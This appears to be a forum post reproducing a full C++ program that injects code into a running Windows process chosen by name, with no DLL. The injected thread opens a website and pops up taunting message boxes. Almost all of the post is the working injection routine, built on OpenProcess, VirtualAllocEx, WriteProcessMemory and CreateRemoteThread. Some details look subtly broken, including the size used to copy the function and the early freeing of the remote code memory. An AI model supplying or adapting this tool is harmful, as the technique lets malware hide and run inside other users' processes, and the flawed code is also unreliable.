[C++] Direct Code Injection with Examples - No DLL for Injection

[Nytro]

[C++] Direct Code Injection with Examples - No DLL for Injection

Author: JuryBen

//Coded By JuryBen


#pragma comment(lib,"user32.LIB")


#include <iostream>
#include <windows.h>
#include <tlhelp32.h>

PROCESSENTRY32 Process;
HANDLE Snapshot;
BOOL ProcessFound;



//REMOTE DATA
struct RemoteData
{
	//Only declare, don't initialize

	//MsgBox
	wchar_t sz[256]; 
	wchar_t mt[256];

	//ShellExecute
	wchar_t open[256];
	wchar_t url[256];


	//GetModuleFileName
	wchar_t locationbuffer[MAX_PATH];

	//DWORD vars
	DWORD dwMessageBox;
	DWORD dwShell;
	DWORD dwLocation;

};

//TYPEDEFS

typedef int(__stdcall*MMessageBox)(HWND,LPCTSTR,LPCTSTR,UINT);
typedef HINSTANCE(__stdcall*MShellExecute)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,INT);
typedef DWORD(__stdcall*MGetModuleFileName)(HMODULE,LPTSTR,DWORD);

//REMOTE THREAD
DWORD __stdcall MHThread(RemoteData *pData)
{


	MMessageBox MsgBox	= (MMessageBox)pData->dwMessageBox;

	MShellExecute SE = (MShellExecute)pData->dwShell;

	MGetModuleFileName GMFN = (MGetModuleFileName)pData->dwLocation;



	SE(NULL,pData->open,pData->url,NULL,NULL,SW_SHOWDEFAULT);

	MsgBox(0, pData->sz, pData->mt, 0);



	GMFN(NULL,pData->locationbuffer,sizeof(pData->locationbuffer));

	MsgBox(0, pData->locationbuffer, pData->mt, 0);

	return 0;
}


int Inject()
{

	std::wcout	<<	"WARNING:  Can cause stability issues and crashes!"	<< std::endl		<< "Injects thread with messagebox in process!" << std::endl;
	std::wcout	<<	"Enter Process Name!"	<< std::endl		<< "Make sure to add the process extension!"	<< std::endl		<< std::endl;
	wchar_t ProcessName[1024];
	std::wcin >> ProcessName;
	std::wcout << std::endl << ProcessName << std::endl;

	bool search = false;

	std::wcout << "Waiting for " << ProcessName << std::endl;

	while(!search)
		{

			Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
			Process.dwSize=sizeof(Process);
			ProcessFound = Process32First(Snapshot,&Process);

			while(ProcessFound) 
				{
					wchar_t searchbuffer[512];
					wcscpy_s(searchbuffer,Process.szExeFile);

					if(!wcscmp(searchbuffer, ProcessName))
						{

							std::wcout << ProcessName << " Found, injecting code!" << std::endl;
							Sleep(1000);

							/////////REMOTE THREAD

							RemoteData data;
							ZeroMemory(&data, sizeof (RemoteData));

							wcscat_s(data.sz, L"im in your processes haxin your threads");
							wcscat_s(data.mt, L"say wut nuggaaaa");

							wcscat_s(data.open, L"open");
							wcscat_s(data.url, L"http://lastfrag.com");


							HINSTANCE hUser		=  LoadLibrary(L"user32.dll");
							HINSTANCE hShell	=  LoadLibrary(L"shell32.dll");
							HINSTANCE hKernel	=  LoadLibrary(L"kernel32.dll");


							if (!hUser || !hShell || !hKernel)
								{
									MessageBox(0, L"LL Failed", L"Error!", 0);
									return 0;
								}

							data.dwMessageBox	=   (DWORD)GetProcAddress(hUser, "MessageBoxW");
							data.dwShell		=	(DWORD)GetProcAddress(hShell, "ShellExecuteW");
							data.dwLocation		=	(DWORD)GetProcAddress(hKernel, "GetModuleFileNameW");

							FreeLibrary(hUser);
							FreeLibrary(hShell);
							FreeLibrary(hKernel);

							if (!data.dwMessageBox || !data.dwShell || !data.dwLocation)
								{
									MessageBox(0, L"Handles Failed", L"Error!", 0);
									return 0;
								}

							//Open Process
							HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Process.th32ProcessID);

							if(!hProcess)
								{
									MessageBox(0, L"OP Failed", L"Error!", 0);
									return 0;
								}


							//VirtualAllocEx
							void *pRemoteThread = VirtualAllocEx(hProcess, 0,  sizeof (RemoteData), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);

							if (!pRemoteThread)
								{
									MessageBox(0, L"RT Failed", L"Error!", 0);
									return 0;
								}

							//WriteProcessMemory
							if (!WriteProcessMemory(hProcess, pRemoteThread, (void*)MHThread,  sizeof (RemoteData), 0))
								{
									MessageBox(0, L"WPM Failed", L"Error!", 0);
									return 0;
								}

							//VirtualAllocEx
							RemoteData *pData = (RemoteData*)VirtualAllocEx(hProcess, 0, sizeof (RemoteData), MEM_COMMIT, PAGE_READWRITE);
							if (!pData)
								{
									MessageBox(0, L"RT Failed", L"Error!", 0);
									return 0;
								}

							//WriteProcessMemory
							if (!WriteProcessMemory(hProcess, pData, &data, sizeof (RemoteData), 0))
								{
								MessageBox(0, L"WPM Failed", L"Error!", 0);
									return 0;
								}


							HANDLE hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, 0);
							if (!hThread)
								{
									MessageBox(0, L"CRT Failed", L"Error!", 0);
									return 0;
								}

							//Clean up
							CloseHandle(hThread);

							VirtualFreeEx(hProcess, pRemoteThread, sizeof (RemoteData), MEM_RELEASE);
							CloseHandle(hProcess);       

						////////////////

							search = true;    

						}

				ProcessFound=Process32Next(Snapshot,&Process);
			}
			CloseHandle(Snapshot); 

			Sleep(100);
	}
        std::cin.ignore();
        std::cin.get();

		return 0;
}


int main()
{
	Inject();

	return 0;
}

Sursa: Direct Code Injection with Examples - No DLL for Injection